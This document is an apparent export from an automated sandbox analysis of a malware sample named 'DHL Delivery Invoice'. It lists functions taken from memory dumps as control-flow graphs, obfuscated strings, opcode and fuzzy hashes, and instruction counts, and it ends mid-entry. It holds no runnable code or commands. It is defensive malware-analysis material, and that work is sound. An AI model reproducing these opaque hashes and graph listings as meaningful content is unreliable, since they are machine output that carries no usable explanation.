                                                                                                                                  control_flow_graph 304 97e2e58-97e2e79 305 97e2e7b 304->305 306 97e2e80-97e2f6c 304->306 305->306 309 97e3794-97e37bc 306->309 310 97e2f72-97e30c3 306->310 313 97e3e99-97e3ea2 309->313 354 97e30c9-97e3124 310->354 355 97e3762-97e3791 310->355 315 97e37ca-97e37d3 313->315 316 97e3ea8-97e3ebf 313->316 317 97e37da-97e38ce 315->317 318 97e37d5 315->318 337 97e38f8 317->337 338 97e38d0-97e38dc 317->338 318->317 341 97e38fe-97e391e 337->341 339 97e38de-97e38e4 338->339 340 97e38e6-97e38ec 338->340 342 97e38f6 339->342 340->342 346 97e397e-97e39f4 341->346 347 97e3920-97e3979 341->347 342->341 366 97e3a49-97e3a8c call 97e2e08 346->366 367 97e39f6-97e3a47 346->367 360 97e3e96 347->360 363 97e3129-97e3134 354->363 364 97e3126 354->364 355->309 360->313 365 97e3678-97e367e 363->365 364->363 369 97e3139-97e3157 365->369 370 97e3684-97e36e3 365->370 394 97e3a97-97e3a9d 366->394 367->394 372 97e31ae-97e31c3 369->372 373 97e3159-97e315d 369->373 406 97e36ef-97e3701 370->406 378 97e31ca-97e31e0 372->378 379 97e31c5 372->379 373->372 377 97e315f-97e316a 373->377 381 97e31a0-97e31a6 377->381 383 97e31e7-97e31fe 378->383 384 97e31e2 378->384 379->378 388 97e316c-97e3170 381->388 389 97e31a8-97e31a9 381->389 386 97e3205-97e321b 383->386 387 97e3200 383->387 384->383 392 97e321d 386->392 393 97e3222-97e3229 386->393 387->386 390 97e3176-97e318e 388->390 391 97e3172 388->391 395 97e322c-97e329d 389->395 398 97e3195-97e319d 390->398 399 97e3190 390->399 391->390 392->393 393->395 400 97e3af4-97e3b00 394->400 401 97e329f 395->401 402 97e32b3-97e342b 395->402 398->381 399->398 404 97e3a9f-97e3ac1 400->404 405 97e3b02-97e3b8a 400->405 401->402 403 97e32a1-97e32ad 401->403 412 97e342d 402->412 413 97e3441-97e357c 402->413 403->402 407 97e3ac8-97e3af1 404->407 408 97e3ac3 404->408 434 97e3d0b-97e3d14 405->434 411 97e374e-97e3754 406->411 407->400 408->407 415 97e3756 411->415 416 97e3703-97e374b 411->416 412->413 417 97e342f-97e343b 412->417 424 97e357e-97e3582 413->424 425 97e35e0-97e35f5 413->425 415->355 416->411 417->413 424->425 429 97e3584-97e3593 424->429 427 97e35fc-97e361d 425->427 428 97e35f7 425->428 431 97e361f 427->431 432 97e3624-97e3643 427->432 428->427 433 97e35d2-97e35d8 429->433 431->432 438 97e364a-97e366a 432->438 439 97e3645 432->439 440 97e35da-97e35db 433->440 441 97e3595-97e3599 433->441 436 97e3b8f-97e3ba4 434->436 437 97e3d1a-97e3d75 434->437 444 97e3bad-97e3cf9 436->444 445 97e3ba6 436->445 463 97e3dac-97e3dd6 437->463 464 97e3d77-97e3daa 437->464 446 97e366c 438->446 447 97e3671 438->447 439->438 448 97e3675 440->448 442 97e359b-97e359f 441->442 443 97e35a3-97e35c4 441->443 442->443 450 97e35cb-97e35cf 443->450 451 97e35c6 443->451 465 97e3d05 444->465 445->444 452 97e3c3b-97e3c7b 445->452 453 97e3bf6-97e3c36 445->453 454 97e3bb3-97e3bf1 445->454 455 97e3c80-97e3cc0 445->455 446->447 447->448 448->365 450->433 451->450 452->465 453->465 454->465 455->465 472 97e3ddf-97e3e70 463->472 464->472 465->434 476 97e3e77-97e3e8f 472->476 476->360
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4'kq$<ov!$TJpq$Tekq$poq$xbnq
                                                                                                                                  • API String ID: 0-2107662943
                                                                                                                                  • Opcode ID: 20feae5ed2dc369b9ffbc5776b2577cf90dbe61c19be2ffaf92612381002a28e
                                                                                                                                  • Instruction ID: 0faeb2643e5e5d102afe9404b279bae9bbbd0b358f7f4c6c49bae60d33e843b7
                                                                                                                                  • Opcode Fuzzy Hash: 20feae5ed2dc369b9ffbc5776b2577cf90dbe61c19be2ffaf92612381002a28e
                                                                                                                                  • Instruction Fuzzy Hash: F4B2C675E00628CFDB54CF69C984AD9BBB2FF89304F1581E9E509AB265DB319E81CF40
                                                                                                                                  Function 097157DC Relevance: 6.9, Strings: 5, Instructions: 624COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 477 97157dc-9717660 480 9717b43-9717bac 477->480 481 9717666-971766b 477->481 487 9717bb3-9717c3b 480->487 481->480 482 9717671-971768e 481->482 482->487 488 9717694-9717698 482->488 531 9717c46-9717cc6 487->531 490 97176a7-97176ab 488->490 491 971769a-97176a4 call 97157ec 488->491 493 97176ba-97176c1 490->493 494 97176ad-97176b7 call 97157ec 490->494 491->490 499 97176c7-97176f7 493->499 500 97177dc-97177e1 493->500 494->493 510 9717ec6-9717eec 499->510 513 97176fd-97177d0 call 97157f8 * 2 499->513 502 97177e3-97177e7 500->502 503 97177e9-97177ee 500->503 502->503 506 97177f0-97177f4 502->506 507 9717800-9717830 call 9715804 * 3 503->507 506->510 511 97177fa-97177fd 506->511 507->531 532 9717836-9717839 507->532 535 9717efc 510->535 536 9717eee-9717efa 510->536 511->507 513->500 543 97177d2 513->543 551 9717ccd-9717d4f 531->551 532->531 537 971783f-9717841 532->537 538 9717eff-9717f04 535->538 536->538 537->531 539 9717847-971787c 537->539 550 9717882-971788b 539->550 539->551 543->500 553 9717891-97178eb call 9715804 * 2 call 9715814 * 2 550->553 554 97179ee-97179f2 550->554 557 9717d57-9717dd9 551->557 596 97178fd 553->596 597 97178ed-97178f6 553->597 554->557 558 97179f8-97179fc 554->558 561 9717de1-9717e0e 557->561 558->561 562 9717a02-9717a08 558->562 572 9717e15-9717e95 561->572 566 9717a0a 562->566 567 9717a0c-9717a41 562->567 571 9717a48-9717a4e 566->571 567->571 571->572 573 9717a54-9717a5c 571->573 634 9717e9c-9717ebe 572->634 578 9717a63-9717a65 573->578 579 9717a5e-9717a62 573->579 585 9717ac7-9717acd 578->585 586 9717a67-9717a8b 578->586 579->578 591 9717aec-9717b1a 585->591 592 9717acf-9717aea 585->592 617 9717a94-9717a98 586->617 618 9717a8d-9717a92 586->618 611 9717b22-9717b2e 591->611 592->611 602 9717901-9717903 596->602 597->602 603 97178f8-97178fb 597->603 608 9717905 602->608 609 971790a-971790e 602->609 603->602 608->609 615 9717910-9717917 609->615 616 971791c-9717922 609->616 633 9717b34-9717b40 611->633 611->634 621 97179b9-97179bd 615->621 623 9717924-971792a 616->623 624 971792c-9717931 616->624 617->510 627 9717a9e-9717aa1 617->627 622 9717aa4-9717ab7 call 9718368 618->622 629 97179dc-97179e8 621->629 630 97179bf-97179d9 621->630 639 9717abd-9717ac5 622->639 631 9717937-971793d 623->631 624->631 627->622 629->553 629->554 630->629 635 9717943-9717948 631->635 636 971793f-9717941 631->636 634->510 642 971794a-971795c 635->642 636->642 639->611 648 9717966-971796b 642->648 649 971795e-9717964 642->649 651 9717971-9717978 648->651 649->651 655 971797a-971797c 651->655 656 971797e 651->656 659 9717983-971798e 655->659 656->659 660 9717990-9717993 659->660 661 97179b2 659->661 660->621 663 9717995-971799b 660->663 661->621 664 97179a2-97179ab 663->664 665 971799d-97179a0 663->665 664->621 667 97179ad-97179b0 664->667 665->661 665->664 667->621 667->661
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Hoq$Hoq$Hoq$Hoq$Hoq
                                                                                                                                  • API String ID: 0-1079488684
                                                                                                                                  • Opcode ID: 65940b33a8f9fc26132a8011ff711a269caa5acd12c72229d956fbe6c81aaab7
                                                                                                                                  • Instruction ID: 35cabf3e94bb2f533999a0f0161379849c83716c61894009f86b6fb3afd93db4
                                                                                                                                  • Opcode Fuzzy Hash: 65940b33a8f9fc26132a8011ff711a269caa5acd12c72229d956fbe6c81aaab7
                                                                                                                                  • Instruction Fuzzy Hash: 01326D71E002588FDB58DF7CC8517AEBBF6AF84300F14856AD40AAB395DB349D45CBA1
                                                                                                                                  Function 097E2E4C Relevance: 4.0, Strings: 3, Instructions: 240COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 855 97e2e4c-97e2e51 856 97e2ec5-97e2f6c 855->856 857 97e2e53-97e2e79 855->857 862 97e3794-97e37bc 856->862 863 97e2f72-97e30c3 856->863 859 97e2e7b 857->859 860 97e2e80-97e2ebf 857->860 859->860 860->856 866 97e3e99-97e3ea2 862->866 907 97e30c9-97e3124 863->907 908 97e3762-97e3791 863->908 868 97e37ca-97e37d3 866->868 869 97e3ea8-97e3ebf 866->869 870 97e37da-97e38ce 868->870 871 97e37d5 868->871 890 97e38f8 870->890 891 97e38d0-97e38dc 870->891 871->870 894 97e38fe-97e391e 890->894 892 97e38de-97e38e4 891->892 893 97e38e6-97e38ec 891->893 895 97e38f6 892->895 893->895 899 97e397e-97e39f4 894->899 900 97e3920-97e3979 894->900 895->894 919 97e3a49-97e3a8c call 97e2e08 899->919 920 97e39f6-97e3a47 899->920 913 97e3e96 900->913 916 97e3129-97e3134 907->916 917 97e3126 907->917 908->862 913->866 918 97e3678-97e367e 916->918 917->916 922 97e3139-97e3157 918->922 923 97e3684-97e36e3 918->923 947 97e3a97-97e3a9d 919->947 920->947 925 97e31ae-97e31c3 922->925 926 97e3159-97e315d 922->926 959 97e36ef-97e3701 923->959 931 97e31ca-97e31e0 925->931 932 97e31c5 925->932 926->925 930 97e315f-97e316a 926->930 934 97e31a0-97e31a6 930->934 936 97e31e7-97e31fe 931->936 937 97e31e2 931->937 932->931 941 97e316c-97e3170 934->941 942 97e31a8-97e31a9 934->942 939 97e3205-97e321b 936->939 940 97e3200 936->940 937->936 945 97e321d 939->945 946 97e3222-97e3229 939->946 940->939 943 97e3176-97e318e 941->943 944 97e3172 941->944 948 97e322c-97e329d 942->948 951 97e3195-97e319d 943->951 952 97e3190 943->952 944->943 945->946 946->948 953 97e3af4-97e3b00 947->953 954 97e329f 948->954 955 97e32b3-97e342b 948->955 951->934 952->951 957 97e3a9f-97e3ac1 953->957 958 97e3b02-97e3b8a 953->958 954->955 956 97e32a1-97e32ad 954->956 965 97e342d 955->965 966 97e3441-97e357c 955->966 956->955 960 97e3ac8-97e3af1 957->960 961 97e3ac3 957->961 987 97e3d0b-97e3d14 958->987 964 97e374e-97e3754 959->964 960->953 961->960 968 97e3756 964->968 969 97e3703-97e374b 964->969 965->966 970 97e342f-97e343b 965->970 977 97e357e-97e3582 966->977 978 97e35e0-97e35f5 966->978 968->908 969->964 970->966 977->978 982 97e3584-97e3593 977->982 980 97e35fc-97e361d 978->980 981 97e35f7 978->981 984 97e361f 980->984 985 97e3624-97e3643 980->985 981->980 986 97e35d2-97e35d8 982->986 984->985 991 97e364a-97e366a 985->991 992 97e3645 985->992 993 97e35da-97e35db 986->993 994 97e3595-97e3599 986->994 989 97e3b8f-97e3ba4 987->989 990 97e3d1a-97e3d75 987->990 997 97e3bad-97e3cf9 989->997 998 97e3ba6 989->998 1016 97e3dac-97e3dd6 990->1016 1017 97e3d77-97e3daa 990->1017 999 97e366c 991->999 1000 97e3671 991->1000 992->991 1001 97e3675 993->1001 995 97e359b-97e359f 994->995 996 97e35a3-97e35c4 994->996 995->996 1003 97e35cb-97e35cf 996->1003 1004 97e35c6 996->1004 1018 97e3d05 997->1018 998->997 1005 97e3c3b-97e3c7b 998->1005 1006 97e3bf6-97e3c36 998->1006 1007 97e3bb3-97e3bf1 998->1007 1008 97e3c80-97e3cc0 998->1008 999->1000 1000->1001 1001->918 1003->986 1004->1003 1005->1018 1006->1018 1007->1018 1008->1018 1025 97e3ddf-97e3e70 1016->1025 1017->1025 1018->987 1029 97e3e77-97e3e8f 1025->1029 1029->913
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849886407.00000000097E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_97e0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: TJpq$Tekq$xbnq
                                                                                                                                  • API String ID: 0-3321955333
                                                                                                                                  • Opcode ID: ecf6f9a86f088d01e56fe89d94c8c3f01754047c65f3dd2ecada82211d8293b6
                                                                                                                                  • Instruction ID: ac120925afed040bdfebfe496e3e022f63b7f6d12d184d0ecae96e0b7ced1e46
                                                                                                                                  • Opcode Fuzzy Hash: ecf6f9a86f088d01e56fe89d94c8c3f01754047c65f3dd2ecada82211d8293b6
                                                                                                                                  • Instruction Fuzzy Hash: 13B17375E006288FDB58CF6AC944ADDBBF2BF88301F14C0A9D909AB365DB345A858F50
                                                                                                                                  Function 02AA132F Relevance: 2.8, Strings: 2, Instructions: 251COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1099 2aa132f-2aa133f 1100 2aa1341 1099->1100 1101 2aa1375-2aa142b 1099->1101 1100->1101 1102 2aa142d 1101->1102 1103 2aa1432-2aa148c call 2aa00e4 1101->1103 1102->1103 1107 2aa148f 1103->1107 1108 2aa1496-2aa14b2 1107->1108 1109 2aa14bb-2aa14bc 1108->1109 1110 2aa14b4 1108->1110 1111 2aa163d-2aa16ad call 2aa00f4 1109->1111 1112 2aa14c1-2aa14ef 1109->1112 1110->1107 1110->1111 1110->1112 1113 2aa159a-2aa15ac 1110->1113 1114 2aa156a-2aa156e 1110->1114 1115 2aa152f-2aa154d call 2aa1c98 1110->1115 1116 2aa15f2-2aa161c 1110->1116 1117 2aa15b1-2aa15cc 1110->1117 1118 2aa14f1-2aa152a 1110->1118 1119 2aa15d1-2aa15ed 1110->1119 1120 2aa1621-2aa1638 1110->1120 1137 2aa16af call 2aa292a 1111->1137 1138 2aa16af call 2aa2c22 1111->1138 1139 2aa16af call 2aa2690 1111->1139 1140 2aa16af call 2aa2f96 1111->1140 1112->1108 1113->1108 1121 2aa1570-2aa157f 1114->1121 1122 2aa1581-2aa1588 1114->1122 1131 2aa1553-2aa1565 1115->1131 1116->1108 1117->1108 1118->1108 1119->1108 1120->1108 1128 2aa158f-2aa1595 1121->1128 1122->1128 1128->1108 1131->1108 1136 2aa16b5-2aa16bf 1137->1136 1138->1136 1139->1136 1140->1136
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Tekq$Tekq
                                                                                                                                  • API String ID: 0-2269808460
                                                                                                                                  • Opcode ID: a0b0ac645e33f9ebf6485bed2eaf6db2c3d5100b9af382fc39b236a407c87769
                                                                                                                                  • Instruction ID: 79a193afcbddc0f13acf1b9e4640d99003d44f48f16bb6fcd81f819f1d346a41
                                                                                                                                  • Opcode Fuzzy Hash: a0b0ac645e33f9ebf6485bed2eaf6db2c3d5100b9af382fc39b236a407c87769
                                                                                                                                  • Instruction Fuzzy Hash: 3EB16974E042499FDB04CFA9C8546EEFFF2BF8A310F14846AD855AB265DB349906CF24
                                                                                                                                  Function 02AA1363 Relevance: 2.8, Strings: 2, Instructions: 250COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1142 2aa1363-2aa142b 1143 2aa142d 1142->1143 1144 2aa1432-2aa148c call 2aa00e4 1142->1144 1143->1144 1148 2aa148f 1144->1148 1149 2aa1496-2aa14b2 1148->1149 1150 2aa14bb-2aa14bc 1149->1150 1151 2aa14b4 1149->1151 1152 2aa163d-2aa16ad call 2aa00f4 1150->1152 1153 2aa14c1-2aa14ef 1150->1153 1151->1148 1151->1152 1151->1153 1154 2aa159a-2aa15ac 1151->1154 1155 2aa156a-2aa156e 1151->1155 1156 2aa152f-2aa154d call 2aa1c98 1151->1156 1157 2aa15f2-2aa161c 1151->1157 1158 2aa15b1-2aa15cc 1151->1158 1159 2aa14f1-2aa152a 1151->1159 1160 2aa15d1-2aa15ed 1151->1160 1161 2aa1621-2aa1638 1151->1161 1178 2aa16af call 2aa292a 1152->1178 1179 2aa16af call 2aa2c22 1152->1179 1180 2aa16af call 2aa2690 1152->1180 1181 2aa16af call 2aa2f96 1152->1181 1153->1149 1154->1149 1162 2aa1570-2aa157f 1155->1162 1163 2aa1581-2aa1588 1155->1163 1172 2aa1553-2aa1565 1156->1172 1157->1149 1158->1149 1159->1149 1160->1149 1161->1149 1169 2aa158f-2aa1595 1162->1169 1163->1169 1169->1149 1172->1149 1177 2aa16b5-2aa16bf 1178->1177 1179->1177 1180->1177 1181->1177
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Tekq$Tekq
                                                                                                                                  • API String ID: 0-2269808460
                                                                                                                                  • Opcode ID: f0c42bbdfacad30e3a047afe64857201480d579cfe78df3539d66bfd803cbcfc
                                                                                                                                  • Instruction ID: 07b4212add976d3d0b7670302b2a41fdfec3a9f99b88598d60e1309b6a0f96f9
                                                                                                                                  • Opcode Fuzzy Hash: f0c42bbdfacad30e3a047afe64857201480d579cfe78df3539d66bfd803cbcfc
                                                                                                                                  • Instruction Fuzzy Hash: ACB17A74E042499FDB04CFE9C8546EEFFF2AF8A300F18846AD855AB255DB349906CF24
                                                                                                                                  Function 02AA1408 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1259 2aa1408-2aa142b 1260 2aa142d 1259->1260 1261 2aa1432-2aa148c call 2aa00e4 1259->1261 1260->1261 1265 2aa148f 1261->1265 1266 2aa1496-2aa14b2 1265->1266 1267 2aa14bb-2aa14bc 1266->1267 1268 2aa14b4 1266->1268 1269 2aa163d-2aa16ad call 2aa00f4 1267->1269 1270 2aa14c1-2aa14ef 1267->1270 1268->1265 1268->1269 1268->1270 1271 2aa159a-2aa15ac 1268->1271 1272 2aa156a-2aa156e 1268->1272 1273 2aa152f-2aa154d call 2aa1c98 1268->1273 1274 2aa15f2-2aa161c 1268->1274 1275 2aa15b1-2aa15cc 1268->1275 1276 2aa14f1-2aa152a 1268->1276 1277 2aa15d1-2aa15ed 1268->1277 1278 2aa1621-2aa1638 1268->1278 1296 2aa16af call 2aa292a 1269->1296 1297 2aa16af call 2aa2c22 1269->1297 1298 2aa16af call 2aa2690 1269->1298 1299 2aa16af call 2aa2f96 1269->1299 1270->1266 1271->1266 1279 2aa1570-2aa157f 1272->1279 1280 2aa1581-2aa1588 1272->1280 1289 2aa1553-2aa1565 1273->1289 1274->1266 1275->1266 1276->1266 1277->1266 1278->1266 1286 2aa158f-2aa1595 1279->1286 1280->1286 1286->1266 1289->1266 1294 2aa16b5-2aa16bf 1296->1294 1297->1294 1298->1294 1299->1294
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Tekq$Tekq
                                                                                                                                  • API String ID: 0-2269808460
                                                                                                                                  • Opcode ID: e531eac8d530b9453d350e9ed0f73bdafccbd76f2180f8f3437fa217ae117813
                                                                                                                                  • Instruction ID: fb5d558ee2e71abc70e6e054b0ad95691242fc8ab2b203fa1b9a75067402299b
                                                                                                                                  • Opcode Fuzzy Hash: e531eac8d530b9453d350e9ed0f73bdafccbd76f2180f8f3437fa217ae117813
                                                                                                                                  • Instruction Fuzzy Hash: 7391D6B4E012099FDB04CFA9C9906AEFBB2FF89300F14942AD519BB354D7355901CF64
                                                                                                                                  Function 02AA3450 Relevance: .4, Instructions: 364COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e4aafc4dc287c8091df21fae6e1f7be830e364ec25ded23b5bee381e4eaac95d
                                                                                                                                  • Instruction ID: c49e42808143d71994b34986200f4db551fa119084fdc116c34aadb71c6685d4
                                                                                                                                  • Opcode Fuzzy Hash: e4aafc4dc287c8091df21fae6e1f7be830e364ec25ded23b5bee381e4eaac95d
                                                                                                                                  • Instruction Fuzzy Hash: 9BF1D174D05246DFCB08CFA9C4958AEFFB2FF89300B549499C452AB215DB34EA86CF90
                                                                                                                                  Function 09835AB0 Relevance: .3, Instructions: 333COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 90894d5ae96a0711f2876f895329f816040a955800b8493d007b809d184c7eaa
                                                                                                                                  • Instruction ID: 74d9f44e1acfed3edb4f9a1e68b33e30712fc1d8d79b90fb6f71acf9c78894ae
                                                                                                                                  • Opcode Fuzzy Hash: 90894d5ae96a0711f2876f895329f816040a955800b8493d007b809d184c7eaa
                                                                                                                                  • Instruction Fuzzy Hash: 55C18C717016049FDB19EB7AC460BAAB7E6AF88704F54846DE14ACB390DB35E902CB91
                                                                                                                                  Function 02AA3540 Relevance: .3, Instructions: 302COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0c2f9c61e2984025ac1eb13ca1503b99860e0565627c6bfa00ffadcdccc50bea
                                                                                                                                  • Instruction ID: d4a9a326668b3d8f64ae7f44885e5fc56bccf15909268b0fb86f6b9b015f2097
                                                                                                                                  • Opcode Fuzzy Hash: 0c2f9c61e2984025ac1eb13ca1503b99860e0565627c6bfa00ffadcdccc50bea
                                                                                                                                  • Instruction Fuzzy Hash: 40D10A74D0520ADFCB08CF9AD4948AEFBB2FF89300B549559D416AB314DB35E982CFA4
                                                                                                                                  Function 097157D5 Relevance: .3, Instructions: 283COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a41e0ec95f290e9e2e6058ca8957aabe570de777e7a3e6264b3e90086c9eba7d
                                                                                                                                  • Instruction ID: 2b5b16b97ad5e755d6c996f7dab64963bd8b815f93addb5c4ff49e535bded535
                                                                                                                                  • Opcode Fuzzy Hash: a41e0ec95f290e9e2e6058ca8957aabe570de777e7a3e6264b3e90086c9eba7d
                                                                                                                                  • Instruction Fuzzy Hash: C9C12972E00258CFCF19CFA9C88579DBBF2AF88310F14C5AAE449AB255DB30D995CB50
                                                                                                                                  Function 09717628 Relevance: .3, Instructions: 283COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1849611989.0000000009710000.00000040.00000800.00020000.00000000.sdmp, Offset: 09710000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9710000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 58eab030a765f92fa886e76f41431817752240a740430b7e5f21fb8ea90091bc
                                                                                                                                  • Instruction ID: 1f27fe2cbe8918096efc4616cd15d189b2de9d2b07e6d726275a58b2abf31d09
                                                                                                                                  • Opcode Fuzzy Hash: 58eab030a765f92fa886e76f41431817752240a740430b7e5f21fb8ea90091bc
                                                                                                                                  • Instruction Fuzzy Hash: 62C13972E00258CFCF19CFA9C885799BBF2AF88310F14C5AAE449AB255DB31D985CF50
                                                                                                                                  Function 02AACA98 Relevance: .2, Instructions: 185COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1c3aa099d13dc32e9d9944442136c156cbab45cfdd334a7897f0ee4f3a549f63
                                                                                                                                  • Instruction ID: c79304c42d0c6ae1fa4d2e3ff07012dc55335615bb59cb9d3c5c6694ed7dbd3f
                                                                                                                                  • Opcode Fuzzy Hash: 1c3aa099d13dc32e9d9944442136c156cbab45cfdd334a7897f0ee4f3a549f63
                                                                                                                                  • Instruction Fuzzy Hash: CF7178B4E062089FDB04CFA9D8555EEBBB2FF89310F14806AD416E7364EB349A06CF51
                                                                                                                                  Function 09833ADC Relevance: .2, Instructions: 167COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1850183523.0000000009830000.00000040.00000800.00020000.00000000.sdmp, Offset: 09830000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_9830000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 00ac0ecb86b33d6082fe57c8192c579dfae3c7b0d32beaa823652d790ac98858
                                                                                                                                  • Instruction ID: 3fcb072aec0e73ae7d3acaab9a1a6101447c9e5a18fa58b271240187cf86d0e0
                                                                                                                                  • Opcode Fuzzy Hash: 00ac0ecb86b33d6082fe57c8192c579dfae3c7b0d32beaa823652d790ac98858
                                                                                                                                  • Instruction Fuzzy Hash: 90611471E44229CBDB68CF66C8407E9FBB6BFC9300F54D1AAD409A7250EB744A85CF80
                                                                                                                                  Function 02AA97E0 Relevance: .2, Instructions: 157COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1826018575.0000000002AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_2aa0000_DHL Delivery Invoice.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
